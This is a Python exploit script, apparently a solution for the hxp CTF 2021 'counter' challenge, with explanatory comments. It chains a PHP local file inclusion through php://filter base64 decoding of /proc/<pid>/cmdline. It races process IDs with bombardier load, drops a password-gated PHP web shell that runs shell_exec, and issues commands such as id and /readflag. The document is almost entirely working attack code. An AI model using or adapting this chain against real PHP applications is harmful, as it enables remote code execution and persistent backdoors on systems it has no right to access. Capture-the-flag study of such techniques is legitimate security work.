  1. #!/usr/bin/env python3
  2. # hxp CTF 2021 counter
  3. import requests, threading, time,os, base64, re, tempfile, subprocess,secrets, hashlib, sys, random, signal
  4. from urllib.parse import urlparse,quote_from_bytes
def urlencode(data, safe=''):
    """Percent-encode the bytes *data*, leaving characters in *safe* untouched.

    Thin wrapper over ``urllib.parse.quote_from_bytes``; note the default
    ``safe=''`` differs from the library default (``'/'``), so ``/`` is
    encoded as ``%2F`` unless the caller opts out.
    """
    return quote_from_bytes(data, safe=safe)
  7.  
# --- Setup -------------------------------------------------------------------
# Target base URL taken verbatim from argv.  It is later interpolated into the
# single-quoted URL argument of the shell commands built in worker() and
# delete_worker() (os.system), so this script must only ever be fed an
# operator-controlled value.
url = f'http://{sys.argv[1]}:{sys.argv[2]}/'

# Per-run random file name and shared secret.  Both PHP snippets below check
# sha1($_GET['s']) against `secret_hash` before doing anything, so only the
# holder of `secret` can drive them.  Both values are echoed to stderr.
backdoor_name = secrets.token_hex(8) + '.php'
secret = secrets.token_hex(16)
secret_hash = hashlib.sha1(secret.encode()).hexdigest()

print('[+] backdoor_name: ' + backdoor_name, file=sys.stderr)
print('[+] secret: ' + secret, file=sys.stderr)

# Stage 2: the PHP that stage 1 writes to `backdoor_name`; it is sent as the
# `p` query parameter by worker().
code = f"<?php if(sha1($_GET['s'])==='{secret_hash}')echo shell_exec($_GET['c']);".encode()
# Stage 1: the PHP the target's include() has to execute.  It stores $_GET['p']
# (stage 2) under `backdoor_name`; the trailing `/*` opens a PHP comment so any
# bytes that decode after the payload are ignored rather than parsed.
# The whole chain relies on the target passing its ?page= parameter to
# include() unfiltered (mitigation: allowlist includable names and never hand
# user input to a php:// stream-wrapper path).
payload = f"""<?php if(sha1($_GET['s'])==='{secret_hash}')file_put_contents("{backdoor_name}",$_GET['p']);/*""".encode()
# The payload is recovered on the target by php://filter/convert.base64-decode
# from a process command line (see the local check below).  The 'abcdfg'
# prefix is presumably there to pad the alphabet characters that precede the
# payload in that cmdline (`sh`, `c`, `rm`, `f` = 6 chars) to a 4-character
# base64 group boundary — confirm against the decoder's behaviour.
payload_encoded = b'abcdfg' + base64.b64encode(payload)
print(payload_encoded)  # NOTE: goes to stdout, unlike the other diagnostics
# Reject any base64 output containing '+', '/' or '=' padding — presumably
# because those would be URL-encoded or shell-significant on the way in.
assert re.match(b'^[a-zA-Z0-9]+$', payload_encoded)

# Local dry run (needs a `php` binary on PATH): emulate the NUL-separated argv
# of `sh -c "rm -f -- '<payload>'"` and verify that the base64-decode filter
# recovers `payload` from it.
with tempfile.NamedTemporaryFile() as tmp:
    tmp.write(b"sh\x00-c\x00rm\x00-f\x00--\x00'"+ payload_encoded +b"'")
    tmp.flush()
    o = subprocess.check_output(['php','-r', f'echo file_get_contents("php://filter/convert.base64-decode/resource={tmp.name}");'])
    print(o, file=sys.stderr)
    assert payload in o

    # Second check: include() the filtered stream with a fake $_GET and confirm
    # stage 1 writes $_GET['p'] ('test') to `backdoor_name`.
    # NOTE: chdir('/tmp') stays in effect for the rest of the script, and the
    # local test file /tmp/<backdoor_name> is never removed.
    os.chdir('/tmp')
    subprocess.check_output(['php','-r', f'$_GET = ["p" => "test", "s" => "{secret}"]; include("php://filter/convert.base64-decode/resource={tmp.name}");'])
    with open(backdoor_name) as f:
        d = f.read()
        assert d == 'test'


# Shared state for the worker threads: plain module globals, no locking.
pid = -1  # base PID guess; raised from /proc/sys/kernel/ns_last_pid in the main loop
N = 10  # number of include workers; worker i probes pid + i

done = False  # cooperative stop flag read by every thread
  41.  
def worker(i):
    """Include-side load generator for slot *i*; runs in a daemon thread.

    Reads the module globals ``done``, ``pid``, ``url``, ``code`` and
    ``secret`` without locking (``pid`` is rewritten by the main loop).  Each
    pass shells out to ``bombardier`` requesting ``/proc/<pid + i>/cmdline``
    through the ``php://filter`` base64-decode wrapper, with stage 2
    (``code``) and the shared secret as query parameters, and returns only
    when that process ends; the loop then re-checks ``done``.
    """
    time.sleep(1)
    while True:
        if done:
            break
        print(f'[+] starting include worker: {pid + i}', file=sys.stderr)
        page = (
            'php%3A%2F%2Ffilter%2Fconvert.base64-decode%2Fresource%3D'
            f'%2Fproc%2F{pid + i}%2Fcmdline'
        )
        query = f'page={page}&p={urlencode(code)}&s={secret}'
        command = f"bombardier -c 1 -d 3m '{url}?{query}' > /dev/null"
        os.system(command)
  48.  
def delete_worker():
    """Reset-side load generator; runs in a daemon thread until ``done`` is set.

    Reads the module globals ``done``, ``url`` and ``payload_encoded``.  Each
    pass shells out to ``bombardier`` with the encoded stage-1 payload as
    ``?page=`` plus ``reset=1`` and returns only when that process ends; the
    loop then re-checks ``done``.
    """
    time.sleep(1)
    while True:
        if done:
            break
        print('[+] starting delete worker', file=sys.stderr)
        page = payload_encoded.decode()
        command = (
            f"bombardier -c 8 -d 3m '{url}?page={page}&reset=1'"
            " > /dev/null"
        )
        os.system(command)
  55.  
# Launch N include workers plus one reset worker.  All are daemon threads, so
# they are torn down with the interpreter on exit(); `done` is only the
# cooperative stop signal.
for i in range(N):
    threading.Thread(target=worker, args=(i, ), daemon=True).start()
threading.Thread(target=delete_worker, daemon=True).start()


# Main loop: follow the target's PID counter and poll for stage 2.
while not done:
    try:
        # /proc/sys/kernel/ns_last_pid is the last PID allocated in the
        # target's PID namespace; the body is expected to be that number.
        # int() raises ValueError on anything else, which the broad except
        # below logs before the loop retries.
        r = requests.get(url, params={
            'page': '/proc/sys/kernel/ns_last_pid'
        }, timeout=10)
        print(f'[+] pid: {pid}', file=sys.stderr)
        # Once the counter has run past the window the workers probe
        # (pid .. pid+N), jump the base ahead by 200 and kill the running
        # bombardier processes so each worker loop restarts with the new pid.
        # `pid` is written here and read by the threads without a lock.
        if int(r.text) > (pid+N):
            pid = int(r.text) + 200
            print(f'[+] pid overflow: {pid}', file=sys.stderr)
            os.system('pkill -9 -x bombardier')

        # Probe for stage 2 under data/.  A 200 is treated as success; the
        # command string also removes the dropped file from the target.
        r = requests.get(f'{url}data/{backdoor_name}', params={
            's' : secret,
            'c': f'id; ls -l /; /readflag; rm {backdoor_name}'
        }, timeout=10)

        if r.status_code == 200:
            print(r.text)
            done = True
            os.system('pkill -9 -x bombardier')
            # exit() is the site builtin; sys.exit() is the conventional form
            # in scripts.  Daemon threads die with the interpreter here.
            exit()


        time.sleep(0.5)
    # Broad catch is deliberate: connection errors, timeouts and a non-numeric
    # ns_last_pid body are all just logged and the loop retries.
    except Exception as e:
        print(e, file=sys.stderr)
  87.  
  88.  